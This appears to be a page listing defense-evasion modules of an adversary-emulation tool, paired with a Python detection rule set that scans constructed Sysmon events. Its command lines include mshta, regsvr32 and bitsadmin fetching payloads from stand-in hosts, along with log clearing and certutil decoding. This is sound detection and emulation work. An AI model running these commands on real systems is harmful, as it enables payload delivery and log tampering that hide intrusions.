Defense Evasion

T1055.002 - Process Injection: Portable Executable Injection

This module uses the CreateProcess, OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread Win32 API functions to inject innocuous shellcode into a target process and run it on a newly created remote thread.

T1055.004 - Process Injection: Asynchronous Procedure Call

This module uses the CreateProcess, OpenProcess, VirtualAllocEx, WriteProcessMemory and QueueUserAPC Win32 API functions to inject innocuous shellcode into a target process. No remote thread is created: the queued APC runs only when the target thread next enters an alertable wait state.

T1220 - XSL Script Processing

This module uses the CreateProcess Win32 API to execute
wmic.exe os get /FORMAT "http://webserver/payload.xsl"

Variation 1

This module uses the System.Diagnostics .NET namespace to clear the Security event log.

Variation 2

This module uses the Win32 API CreateProcess to execute a specific command:
wevtutil.exe cl Security

T1218.011 - Signed Binary Proxy Execution: Rundll32

This module uses the CreateProcess Win32 API to execute
rundll32.exe C:\Windows\twain_64.dll

T1218.003 - Signed Binary Proxy Execution: CMSTP

This module uses the CreateProcess Win32 API to execute
cmstp.exe /s /ns C:\Users\Administrator\AppData\Local\Temp\XKNqbpzl.txt

T1218.005 - Signed Binary Proxy Execution: Mshta

This module uses the CreateProcess Win32 API to execute
mshta.exe http://webserver/payload.hta

T1140 - Deobfuscate/Decode Files or Information

This module uses the CreateProcess Win32 API to execute
certutil.exe -decode encodedb64.txt decoded.exe

T1218.010 - Signed Binary Proxy Execution: Regsvr32

This module uses the CreateProcess Win32 API to execute
regsvr32.exe /u /n /s /i:http://malicious.domain:8080/payload.sct scrobj.dll

T1218.009 - Signed Binary Proxy Execution: Regsvcs/Regasm

This module uses the CreateProcess Win32 API to execute
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U winword.dll

T1218.004 - Signed Binary Proxy Execution: InstallUtil

This module uses the CreateProcess Win32 API to execute
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfiles /LogToConsole=false /U C:\Windows\Temp\XKNqbpzl.exe

T1197 - BITS Jobs

This module uses the CreateProcess Win32 API to execute
bitsadmin.exe /transfer job /download /priority high http://web.evil/sc.exe C:\Windows\Temp\winword.exe
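The modules above are only useful to a defender if each one leaves a detectable trace. The following is an added example, not code from the original page or from the emulation tool it describes: a small rule set that flags the command lines of every proxy-execution, decode, BITS and event-log module listed in this section, plus the two T1055 injection modules, when run over Sysmon-style events. The events, the pipe-separated line format, the parent/target process names (agent.exe, notepad.exe) and the GrantedAccess values are all constructed for the demo; the T1070.001 mapping for the two event-log variations is supplied here, since the page gives no ID for them. The injection rules make one point the module text implies but does not state: Sysmon Event ID 8 (CreateRemoteThread) catches the CreateRemoteThread module but never the QueueUserAPC module, so the Event ID 10 (ProcessAccess) rule keys on write rights to the target instead and covers both.

```python
"""Detection rules for the catalogued defense-evasion modules, run over
constructed Sysmon-style events (demo data, not real telemetry)."""
import re

# (technique, description, regex applied to the lowercased command line).
# T1070.001 is the ATT&CK mapping added here for the two event-log variations.
LOLBIN_RULES = [
    ("T1220", "XSL Script Processing (wmic /FORMAT <url>)",
     r'\bwmic(\.exe)?\b.*\s/format[:\s]+"?https?://'),
    ("T1070.001", "Clear Windows Event Logs (wevtutil cl)",
     r'\bwevtutil(\.exe)?\s+(cl|clear-log)\b'),
    ("T1218.011", "Rundll32 loading a DLL outside System32/SysWOW64",
     r'\brundll32(\.exe)?\s+"?(?!c:\\windows\\(system32|syswow64)\\)[^\s"]+\.dll'),
    ("T1218.003", "CMSTP silent INF install (/s /ns)",
     r'\bcmstp(\.exe)?\b.*\s/s\b.*\s/ns\b'),
    ("T1218.005", "Mshta fetching a remote HTA",
     r'\bmshta(\.exe)?\s+"?https?://'),
    ("T1140", "certutil -decode",
     r'\bcertutil(\.exe)?\b.*\s-decode\b'),
    ("T1218.010", "Regsvr32 remote scriptlet (/i:<url> scrobj.dll)",
     r'\bregsvr32(\.exe)?\b.*\s/i:https?://.*\bscrobj\.dll'),
    ("T1218.009", "Regsvcs/Regasm uninstall (/U) of an arbitrary DLL",
     r'\b(regsvcs|regasm)(\.exe)?\b.*\s/u\b'),
    ("T1218.004", "InstallUtil uninstall (/U) of an arbitrary assembly",
     r'\binstallutil(\.exe)?\b.*\s/u\b'),
    ("T1197", "BITS download job",
     r'\bbitsadmin(\.exe)?\b.*\s/transfer\b.*https?://'),
]
COMPILED = [(t, d, re.compile(rx)) for t, d, rx in LOLBIN_RULES]

# Subset of the process access-mask bits reported in Sysmon EID 10 GrantedAccess.
PROCESS_VM_OPERATION, PROCESS_VM_WRITE = 0x8, 0x20


def parse_event(line):
    """Parse one constructed event line: EID|field1|field2[|field3]."""
    f = line.rstrip("\n").split("|")
    eid = int(f[0])
    if eid == 1:    # process create: Image | CommandLine
        return {"eid": 1, "image": f[1], "cmd": f[2]}
    if eid == 8:    # CreateRemoteThread: SourceImage | TargetImage
        return {"eid": 8, "source": f[1], "target": f[2]}
    if eid == 10:   # ProcessAccess: SourceImage | TargetImage | GrantedAccess (hex)
        return {"eid": 10, "source": f[1], "target": f[2], "access": int(f[3], 16)}
    return {"eid": eid}


def match_event(ev):
    """Return a list of (technique, description) hits for one parsed event."""
    hits = []
    if ev["eid"] == 1:
        cmd = ev["cmd"].lower()
        hits += [(t, d) for t, d, rx in COMPILED if rx.search(cmd)]
    elif ev["eid"] == 8 and ev["source"].lower() != ev["target"].lower():
        hits.append(("T1055.002", "Remote thread created in another process"))
    elif ev["eid"] == 10:
        need = PROCESS_VM_OPERATION | PROCESS_VM_WRITE
        # Write rights alone are enough: the APC variant never creates a
        # remote thread, so an EID 8 rule would miss it entirely.
        if ev["access"] & need == need:
            hits.append(("T1055", "Handle with VM write rights to another process"))
    return hits


def scan(lines):
    """Scan raw event lines; return [(line_no, technique, description), ...]."""
    return [(i, t, d) for i, line in enumerate(lines, 1)
            for t, d in match_event(parse_event(line))]


# Constructed sample events mirroring the module command lines above.
SAMPLE_EVENTS = [
    r'1|C:\Windows\System32\wbem\WMIC.exe|wmic.exe os get /FORMAT "http://webserver/payload.xsl"',
    r'1|C:\Windows\System32\wevtutil.exe|wevtutil.exe cl Security',
    r'1|C:\Windows\System32\rundll32.exe|rundll32.exe C:\Windows\twain_64.dll',
    r'1|C:\Windows\System32\rundll32.exe|rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL',
    r'1|C:\Windows\System32\cmstp.exe|cmstp.exe /s /ns C:\Users\Administrator\AppData\Local\Temp\XKNqbpzl.txt',
    r'1|C:\Windows\System32\mshta.exe|mshta.exe http://webserver/payload.hta',
    r'1|C:\Windows\System32\certutil.exe|certutil.exe -decode encodedb64.txt decoded.exe',
    r'1|C:\Windows\System32\regsvr32.exe|regsvr32.exe /u /n /s /i:http://malicious.domain:8080/payload.sct scrobj.dll',
    r'1|C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe|C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U winword.dll',
    r'1|C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe|C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfiles /LogToConsole=false /U C:\Windows\Temp\XKNqbpzl.exe',
    r'1|C:\Windows\System32\bitsadmin.exe|bitsadmin.exe /transfer job /download /priority high http://web.evil/sc.exe C:\Windows\Temp\winword.exe',
    r'8|C:\Users\Administrator\agent.exe|C:\Windows\System32\notepad.exe',
    r'10|C:\Users\Administrator\agent.exe|C:\Windows\System32\notepad.exe|0x2A',
    r'10|C:\Windows\System32\taskmgr.exe|C:\Windows\System32\notepad.exe|0x1000',
]

if __name__ == "__main__":
    for line_no, tech, desc in scan(SAMPLE_EVENTS):
        print(f"line {line_no:2d}: {tech:10s} {desc}")
```

The benign rundll32 line (shell32.dll under System32) and the EID 10 line carrying only PROCESS_QUERY_LIMITED_INFORMATION (0x1000) produce no hits; every other line produces exactly one. The regexes are deliberately anchored on the switch that makes each invocation suspicious (/FORMAT with a URL, /i: with a URL plus scrobj.dll, /U with an arbitrary assembly) rather than on the binary name alone, since all of these binaries run legitimately on a healthy host.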